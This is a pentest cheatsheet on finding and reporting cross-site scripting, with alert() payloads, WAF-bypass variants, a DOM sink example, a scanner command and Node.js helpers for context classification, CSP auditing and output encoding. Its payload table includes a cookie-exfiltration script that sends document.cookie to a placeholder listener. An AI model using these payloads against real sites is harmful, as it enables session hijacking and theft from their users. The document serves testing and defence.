🛡️ Methodology Checklist
- Test reflected XSS: `<script>alert(1)</script>` in all URL params and form fields
- Stored XSS: submit payload to any field that persists and is viewed by others
- DOM-based: review JS source for `document.write`, `innerHTML`, `location.hash`
- Attribute context: `"><svg onload=alert(1)>` or `" onmouseover="alert(1)`
- Filter bypass: `<img src=x onerror=alert(1)>`, hex encoding, case variations
- Blind XSS: use out-of-band callback (XSS Hunter, Burp Collaborator)
- Document injection point, context, and impact for report
🎯 Operational Context
Use when: Identifying XSS vulnerability type (reflected, stored, DOM-based) and finding injection points in the application.
Think Dumber First: Test every input field and URL parameter with `<script>alert(1)</script>`. If that's filtered, try `<img src=x onerror=alert(1)>` or `<svg onload=alert(1)>`. For DOM XSS: check the JS source for `innerHTML`, `document.write`, `eval` fed with user-controlled data.
Skip when: Application uses a modern framework (React, Angular) with its default escaping left on → reflected/stored XSS through templated output is unlikely, but DOM XSS is still possible wherever the code opts out of escaping (React `dangerouslySetInnerHTML`, Angular `bypassSecurityTrustHtml`) or writes user data into a raw DOM sink.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| `<script>alert(window.origin)</script>` | Basic XSS PoC → confirms execution and shows which origin ran it (main app vs iframe) |
| `<script>print()</script>` | Alternative PoC when `alert` is WAF-blocked |
| `<plaintext>` | Renders the rest of the page as raw text → confirms HTML injection even if JS is blocked |
| `http://[TARGET_IP]/page.html#<script>alert('DOM_XSS')</script>` | DOM XSS via URL hash fragment (fires only if the page writes the fragment into a sink that executes script, e.g. `document.write`) |
| `http://[TARGET_IP]/#task=<img src='' onerror=alert(window.origin)>` | DOM XSS via `innerHTML` sink (`<script>` inserted through `innerHTML` is not executed; event handlers are) |
| `<img src="" onerror=alert(window.origin)>` | `innerHTML` sink bypass → use event handlers, not `<script>` |
| `<svg/onload=alert(1)>` | Minimal SVG-based bypass |
| `"><img src=x onerror=alert(1)>` | Break out of HTML attribute context first |
| `<HtMl%09onPoIntERENTER+=+confirm()>` | Obfuscated WAF-bypass payload (tab between tag and handler, mixed case, `+` for spaces; fires when the pointer enters the element) |
| `python xsstrike.py -u "http://[TARGET_IP]/index.php?task=test"` | Automated XSS scanner |
| `<script>new Image().src="http://[LHOST]:[LPORT]/log?c="+document.cookie;</script>` | Cookie exfiltration PoC (HttpOnly cookies are not readable from `document.cookie`) |
🔬 Deep Dive & Workflow
XSS Type Matrix
| Type | Persistent? | Server involved? | Trigger |
|---|---|---|---|
| Stored | Yes | Yes | Any visitor loads poisoned page |
| Reflected | No | Yes | Victim clicks crafted URL |
| DOM-based | No | No | URL hash/fragment processed client-side |
Identifying the type:
- Does the payload still fire after you navigate away and come back? → Stored
- Does it only fire when a victim opens a crafted link? → Reflected
- Does nothing appear in Burp HTTP History? → DOM-based (the `#` fragment is never sent to the server)
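Once a reflection shows up in the response, the next question is which of the contexts listed in the next section it landed in, because that decides the breakout payload. The following is an added example and is not part of the original cheatsheet: a Node.js helper that scans an HTML response for a canary string you sent in the tested parameter, classifies every hit by what precedes it, and suggests the first payload to try. The canary value, the sample response and the `classifyAt`/`classifyReflections` names are assumptions for the demo; the classifier is a heuristic over the raw HTML rather than a real parser, so it will misjudge exotic nesting and you still confirm by hand.

```javascript
// Added example (not from the original page): classify where a reflected canary
// lands in an HTML response. All names and sample data below are constructed.
const CANARY = 'zxq7canary'; // assumed unique marker sent in the tested parameter

// First payload to try per context, taken from this page's context list.
const SUGGESTED = {
  html_text:     '<script>alert(window.origin)</script>',
  html_comment:  '--><img src=x onerror=alert(1)>',
  attr_dq:       '"><img src=x onerror=alert(1)>',
  attr_sq:       "'><img src=x onerror=alert(1)>",
  attr_unquoted: ' onmouseover=alert(1) x=',
  url_attr:      'javascript:alert(1)',
  event_handler: 'alert(1)',
  script_sq:     "'; alert(1); //",
  script_dq:     '"; alert(1); //',
  script_raw:    'alert(1)',
};
const URL_ATTRS = ['href', 'src', 'action', 'formaction', 'data'];

// Decide the context at offset idx by looking only at what precedes it.
function classifyAt(html, idx) {
  const before = html.slice(0, idx);
  const lower = before.toLowerCase();

  // Inside an unterminated <script>: an odd number of unescaped quotes means
  // the canary sits inside a string literal of that quote type.
  const scriptOpen = lower.lastIndexOf('<script');
  if (scriptOpen !== -1 && lower.indexOf('</script', scriptOpen) === -1) {
    const body = before.slice(before.indexOf('>', scriptOpen) + 1);
    const sq = (body.match(/(?<!\\)'/g) || []).length;
    const dq = (body.match(/(?<!\\)"/g) || []).length;
    if (sq % 2 === 1) return 'script_sq';
    if (dq % 2 === 1) return 'script_dq';
    return 'script_raw';
  }

  // Inside an unterminated HTML comment.
  const commentOpen = before.lastIndexOf('<!--');
  if (commentOpen !== -1 && before.indexOf('-->', commentOpen) === -1) return 'html_comment';

  // Inside a tag: the last '<' comes after the last '>'.
  const lt = before.lastIndexOf('<');
  if (lt > before.lastIndexOf('>')) {
    const tagPart = before.slice(lt);
    // quoted attribute value: name, opening quote, value text so far (no closing quote yet)
    const q = tagPart.match(/([A-Za-z_:][\w:.-]*)\s*=\s*(["'])((?:(?!\2).)*)$/);
    // unquoted attribute value: name, value text so far (no whitespace yet)
    const u = q ? null : tagPart.match(/([A-Za-z_:][\w:.-]*)\s*=\s*([^"'\s>][^\s>]*)?$/);
    const m = q || u;
    if (m) {
      const attr = m[1].toLowerCase();
      const quote = q ? q[2] : '';
      const prefix = q ? q[3] : (u[2] || '');
      if (/^on\w+$/.test(attr)) return 'event_handler';
      // javascript: only works when the canary is at the very start of the URL value
      if (URL_ATTRS.includes(attr) && prefix === '') return 'url_attr';
      if (quote === '"') return 'attr_dq';
      if (quote === "'") return 'attr_sq';
      return 'attr_unquoted';
    }
    return 'attr_unquoted'; // canary landed where an attribute name would go
  }
  return 'html_text';
}

// Every occurrence of the canary in the response, with its context and payload hint.
function classifyReflections(html, canary = CANARY) {
  const hits = [];
  for (let i = html.indexOf(canary); i !== -1; i = html.indexOf(canary, i + canary.length)) {
    const context = classifyAt(html, i);
    hits.push({ offset: i, context, suggested: SUGGESTED[context] });
  }
  return hits;
}

// Constructed response that reflects the canary in seven different contexts.
const SAMPLE_RESPONSE = [
  '<html><body>',
  '<p>You searched for: zxq7canary</p>',
  '<input type="text" name="q" value="zxq7canary">',
  '<div class=zxq7canary>unquoted</div>',
  '<a href="zxq7canary">link</a>',
  '<button onclick="track(\'zxq7canary\')">go</button>',
  "<script>var q = 'zxq7canary'; track(q);</script>",
  '<!-- debug: zxq7canary -->',
  '</body></html>',
].join('\n');
```

Feed it the raw response body from Burp (`classifyReflections(body)`), not the browser's rendered DOM: the point is to see the characters the server emitted before the parser cleaned them up. A hit classified as `attr_dq` whose `"` comes back as `&quot;` is the "reflected but not executing" case from the troubleshooting table.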
Context-Specific Injection Points
```html
<!-- Standard input (HTML body) → default test -->
<script>alert(window.origin)</script>
<!-- Inside HTML attribute: <input value="YOUR_INPUT"> -->
"><img src=x onerror=alert(1)>
<!-- Inside <script> block: var x = 'YOUR_INPUT'; -->
'; alert(1); //
<!-- Inside URL attribute: href="YOUR_INPUT" -->
javascript:alert(1)
```
DOM XSS Source/Sink Analysis
Look in JS files for sources feeding into dangerous sinks:
```javascript
// Source: reads the task= parameter straight from the URL
var pos = document.URL.indexOf("task=");
var task = document.URL.substring(pos + 5, document.URL.length);
// Sink: writes it into the DOM without sanitization. <script> elements inserted via
// innerHTML are not executed, but an <img onerror> handler fires as soon as it is parsed.
document.getElementById("todo").innerHTML = "<b>Next:</b> " + decodeURIComponent(task);
```
Dangerous sinks: `innerHTML`, `outerHTML`, `insertAdjacentHTML()`, `document.write()`, `document.writeln()`, `eval()`, `setTimeout()`/`setInterval()` with a string argument, jQuery `html()`, `append()`, `prepend()`
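Reading every JS file by hand does not scale, and a plain grep for `innerHTML` drowns you in safe hits. The following is an added example, not code from the original page or from any tool it mentions: a line-based scanner that remembers which variables were assigned from a DOM XSS source and reports only the lines where a source or a tainted variable meets a sink. It runs under Node.js; the `scanDomXss` name and the sample file are assumptions for the demo. It is a heuristic, not real taint tracking: flows through function calls, object properties or statements split across lines are not followed, so treat a clean result as "nothing obvious", not "nothing there".

```javascript
// Added example (not from the original page): line-based source-to-sink scanner
// for JS text. Sample input below is constructed and includes the page's snippet.

const SOURCES = [
  'document.URL', 'document.documentURI', 'document.location', 'location.href',
  'location.hash', 'location.search', 'location.pathname', 'document.referrer',
  'window.name', 'document.cookie',
];

const SINKS = [
  { name: 'innerHTML',          re: /\.innerHTML\s*=[^=]/ },
  { name: 'outerHTML',          re: /\.outerHTML\s*=[^=]/ },
  { name: 'insertAdjacentHTML', re: /\.insertAdjacentHTML\s*\(/ },
  { name: 'document.write',     re: /\bdocument\.write(?:ln)?\s*\(/ },
  { name: 'eval',               re: /\beval\s*\(/ },
  { name: 'Function',           re: /\bnew\s+Function\s*\(/ },
  // setTimeout/setInterval are sinks only when the first argument is not a function
  { name: 'setTimeout/setInterval',
    re: /\bset(?:Timeout|Interval)\s*\(\s*(?!function\b|\(|[A-Za-z_$][\w$]*\s*=>)/ },
  // jQuery html()/append()/prepend() with an argument (argument-less html() is a getter)
  { name: 'jQuery html/append/prepend', re: /\.(?:html|append|prepend|after|before)\s*\(\s*[^)\s]/ },
];

// Regex for a source or identifier as a whole token (so `task` does not match `tasks`).
function tokenRe(name) {
  return new RegExp('(?<![\\w$.])' + name.replace(/[$.]/g, '\\$&') + '(?![\\w$])');
}

// Names of sources / tainted variables that appear in `text`.
function taintedIn(text, tainted) {
  const via = [];
  for (const s of SOURCES) if (tokenRe(s).test(text)) via.push(s);
  for (const v of tainted) if (tokenRe(v).test(text)) via.push(v);
  return via;
}

// Returns [{ line, sink, via }] for every line where tainted data reaches a sink.
function scanDomXss(js) {
  const tainted = new Set();
  const findings = [];
  js.split('\n').forEach((line, i) => {
    // Propagate taint through simple assignments: `var x = <expr>`.
    const assign = line.match(/^\s*(?:var|let|const)?\s*([A-Za-z_$][\w$]*)\s*=(?!=)\s*(.+)$/);
    if (assign) {
      if (taintedIn(assign[2], tainted).length) tainted.add(assign[1]);
      else tainted.delete(assign[1]); // reassigned from clean data
    }
    const via = taintedIn(line, tainted);
    if (via.length === 0) return;
    for (const sink of SINKS) {
      if (sink.re.test(line)) findings.push({ line: i + 1, sink: sink.name, via });
    }
  });
  return findings;
}

// Constructed sample: the page's vulnerable snippet plus safe and unsafe neighbours.
const SAMPLE_JS = [
  'var pos = document.URL.indexOf("task=");',
  'var task = document.URL.substring(pos + 5, document.URL.length);',
  'var label = "static string";',
  'document.getElementById("todo").innerHTML = "<b>Next:</b> " + decodeURIComponent(task);',
  'document.getElementById("note").innerHTML = label;',
  'document.getElementById("title").textContent = task;',
  'var frag = location.hash.slice(1);',
  'setTimeout(frag, 0);',
  'setTimeout(function () { render(frag); }, 0);',
].join('\n');
```

On the sample it reports line 4 (`innerHTML` via `task`) and line 8 (string `setTimeout` via `frag`) and stays quiet on the `textContent` write, the static `innerHTML` assignment and the `setTimeout` that receives a function. Run it over pretty-printed bundles (`js-beautify` first); minified one-line files defeat the line-based taint memory.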
XSStrike (Automated Discovery)
```shell
git clone https://github.com/s0md3v/XSStrike.git
cd XSStrike && pip install -r requirements.txt
python xsstrike.py -u "http://[TARGET_IP]/index.php?task=test"
```
Key Detection Notes
- `window.origin` in the alert: confirms which origin executed the payload and distinguishes an iframe from the main app
- DOM XSS: inspect the rendered DOM (F12 Inspector), not the raw source (Ctrl+U); the injected markup never appears in the server response
- Header injection: try XSS in `User-Agent` or `Cookie` → may trigger Stored XSS in admin logs
- `<plaintext>`: only confirms HTML injection; if JS is filtered but HTML isn't, it is still a finding
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| `alert()` blocked | Keyword filter, or a CSP that forbids inline script | Against a filter: `confirm(1)`, `prompt(1)`, `print()`, `console.log(1)`. A CSP is not bypassed by renaming the function: read the `Content-Security-Policy` header and the console error, and look for `'unsafe-inline'`, wildcards or allowlisted hosts you can abuse; for targets you cannot observe, use Burp Collaborator |
| Script tags filtered | Tag-based filter | Try attribute/event-handler injection: `<img src=x onerror=alert(1)>`, `<body onload=alert(1)>`, `<details open ontoggle=alert(1)>` |
| XSS payload reflected but not executing | HTML entity encoding on output | View source → if you see `&lt;script&gt;`, the output is encoded; look for unencoded reflection points (attribute values, JS strings, URLs) |
| DOM XSS not obvious | Need to read JS | Search for: `innerHTML`, `outerHTML`, `document.write`, `eval`, `setTimeout` with variable input; trace the data flow back to the source |
| Blind XSS → no immediate feedback | Payload executes later, in a context you cannot see (admin panel, log viewer, ticket queue) | Use XSS Hunter or Burp Collaborator to capture the callback when an admin reviews the content |
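When `alert()` is blocked by a CSP rather than a filter, the useful next step is to read the policy and decide whether it actually stops an injected script. The following is an added example and not part of the original cheatsheet: a Node.js CSP parser with the checks a tester runs first (no `script-src` at all, `'unsafe-inline'` without a nonce or hash, `'unsafe-eval'`, wildcard or scheme sources, a host allowlist without `'strict-dynamic'`, `object-src` not `'none'`, missing `base-uri`). The `parseCsp`/`auditCsp` names and both sample headers are assumptions for the demo; `cdn.example.com` is a placeholder host.

```javascript
// Added example (not from the original page): parse a Content-Security-Policy
// header and flag what still lets an injected script run. Headers below are
// constructed for the demo; cdn.example.com is a placeholder host.

function parseCsp(header) {
  const policy = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    // Browsers honour the first occurrence of a directive and ignore repeats.
    if (!(name in policy)) policy[name] = tokens.slice(1);
  }
  return policy;
}

function auditCsp(header) {
  const policy = parseCsp(header);
  const findings = [];
  // script-src falls back to default-src; with neither, scripts are unrestricted.
  const where = policy['script-src'] ? 'script-src' : 'default-src';
  const script = policy[where];

  if (!script) {
    findings.push('no script-src or default-src: inline and remote scripts are unrestricted');
  } else {
    const src = script.map(s => s.toLowerCase());
    const nonceOrHash = src.some(s => /^'(nonce-|sha(256|384|512)-)/.test(s));
    const strictDynamic = src.includes("'strict-dynamic'");
    // With a nonce or hash present, CSP2+ browsers ignore 'unsafe-inline'.
    if (src.includes("'unsafe-inline'") && !nonceOrHash)
      findings.push(`${where}: 'unsafe-inline' lets injected inline script run`);
    if (src.includes("'unsafe-eval'"))
      findings.push(`${where}: 'unsafe-eval' lets eval()/Function()/string setTimeout run attacker strings`);
    const wild = src.filter(s => s.includes('*'));
    if (wild.length) findings.push(`${where}: wildcard source(s) ${wild.join(' ')}`);
    const schemes = src.filter(s => /^(https?|data|blob):$/.test(s));
    if (schemes.length) findings.push(`${where}: scheme source(s) ${schemes.join(' ')} allow any URL with that scheme`);
    // 'strict-dynamic' makes host allowlists irrelevant; otherwise every allowed host
    // is a bypass candidate (JSONP endpoints, AngularJS or other script gadgets).
    const hosts = src.filter(s => !s.startsWith("'") && !s.includes('*') && !/^[a-z][a-z0-9+.-]*:$/.test(s));
    if (hosts.length && !strictDynamic)
      findings.push(`${where}: host allowlist ${hosts.join(' ')}; check each host for JSONP or script gadgets`);
  }
  const obj = policy['object-src'] || policy['default-src'];
  if (!obj || !obj.map(s => s.toLowerCase()).includes("'none'"))
    findings.push("object-src is not 'none': plugin content can be used to run script");
  if (!policy['base-uri'])
    findings.push('base-uri missing: an injected <base> tag can redirect relative script URLs');
  return findings;
}

// Constructed headers: a typical weak policy and a strict nonce-based one.
const WEAK_CSP = "default-src 'self'; script-src 'self' 'unsafe-inline' https://cdn.example.com";
const STRICT_CSP = "script-src 'nonce-r4nd0m' 'strict-dynamic'; object-src 'none'; base-uri 'none'";
```

`auditCsp(WEAK_CSP)` returns four findings (the `'unsafe-inline'` one is the immediate win: the `<script>` PoC from the cheatsheet works as-is), while `auditCsp(STRICT_CSP)` returns none. An empty result means the PoC has to move from inline script to an allowed execution path, which is where the JSONP and gadget hunt on allowlisted hosts starts.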
📝 Reporting Trigger
Finding Title: Cross-Site Scripting (XSS) Vulnerability Identified
Impact: The XSS vulnerability allows injecting malicious scripts that execute in users' browsers, enabling session hijacking, credential phishing, keylogging, and malware distribution through a trusted application domain.
Root Cause: User-supplied input reflected in HTTP responses, or written to a DOM sink by client-side code, without context-aware output encoding. Missing or inadequate Content Security Policy.
Recommendation: Implement context-sensitive output encoding for all user input (HTML body, attribute, JavaScript string and URL contexts each need their own encoder). Apply a strict CSP (nonce- or hash-based `script-src`, `object-src 'none'`). Set the HttpOnly and Secure flags on session cookies (limits cookie theft; does not prevent the XSS itself). Validate input with allowlisting. Deploy automated XSS scanning in the CI/CD pipeline.
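The recommendation above only helps if the developers understand that "output encoding" is four different encoders, one per context from the injection-point list, and that the wrong one leaves the breakout open. The following is an added example and not part of the original cheatsheet: Node.js encoders for the HTML body, attribute, JS string and URL contexts, a `renderSafe` that applies the right one to each of the page's four templates, and a `renderWrongEncoder` that shows the common mismatch of HTML-encoding inside a `'...'` JS string with a helper that leaves single quotes alone (the behaviour of PHP's `htmlspecialchars()` before 8.1). Function names, templates and payloads are assumptions for the demo.

```javascript
// Added example (not from the original page): one output encoder per reflection
// context, a safe renderer for the page's four templates, and a demonstration of
// the HTML-encoder-in-JS-string mistake. All templates/payloads are constructed.

const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };

// HTML body context: neutralise the characters that can start a tag, entity or attribute.
function encodeForHtml(s) {
  return String(s).replace(/[&<>"'\/]/g, c => HTML_ENTITIES[c]);
}

// Legacy "escape" helper that leaves single quotes alone: fine in HTML text,
// fatal inside a single-quoted JS string.
function encodeForHtmlLegacy(s) {
  return String(s).replace(/[&<>"]/g, c => HTML_ENTITIES[c]);
}

// Attribute context: encode everything except alphanumerics, and always quote the attribute.
function encodeForHtmlAttr(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, c => `&#x${c.charCodeAt(0).toString(16).toUpperCase()};`);
}

// JS string context: \xHH / \uHHHH so no quote, newline or </script> survives.
function encodeForJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, c => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).toUpperCase().padStart(2, '0')
      : '\\u' + code.toString(16).toUpperCase().padStart(4, '0');
  });
}

// URL context: encoding cannot fix the scheme, so allowlist it. Browsers ignore leading
// whitespace/control characters and embedded tab/CR/LF when parsing the scheme.
function safeUrl(s) {
  const cleaned = String(s).replace(/^[\u0000-\u0020]+/, '').replace(/[\t\r\n]/g, '');
  const scheme = cleaned.match(/^([a-z][a-z0-9+.-]*):/i);
  if (scheme && !['http', 'https', 'mailto'].includes(scheme[1].toLowerCase())) return '#';
  return cleaned;
}

// The four contexts from the page, each with the matching encoder.
function renderSafe(input) {
  return [
    `<p>${encodeForHtml(input)}</p>`,
    `<input value="${encodeForHtmlAttr(input)}">`,
    `<script>var x = '${encodeForJsString(input)}';</script>`,
    `<a href="${encodeForHtmlAttr(safeUrl(input))}">link</a>`,
  ].join('\n');
}

// The mismatch: HTML-encoding inside a JS string.
function renderWrongEncoder(input) {
  return `<script>var x = '${encodeForHtmlLegacy(input)}';</script>`;
}

// Number of real tags in the markup; renderSafe() must always produce exactly 7.
function tagCount(html) {
  return (html.match(/<\/?[a-z]/gi) || []).length;
}

// Body of the first <script> with string literals blanked out: anything left is live code.
function jsOutsideStrings(html) {
  const body = (html.match(/<script>([\s\S]*?)<\/script>/i) || ['', ''])[1];
  return body.replace(/'(?:[^'\\]|\\.)*'/g, "''").replace(/"(?:[^"\\]|\\.)*"/g, '""');
}
```

With `'; alert(1); //` as input, `renderWrongEncoder` yields `var x = ''; alert(1); //';`, a closed string followed by live `alert(1)`, while `renderSafe` keeps the whole payload inside the literal as `\x27\x3B\x20alert...`. `safeUrl` is the part teams most often skip: `javascript:alert(1)` survives any amount of entity encoding, so the scheme has to be checked before the attribute encoder runs.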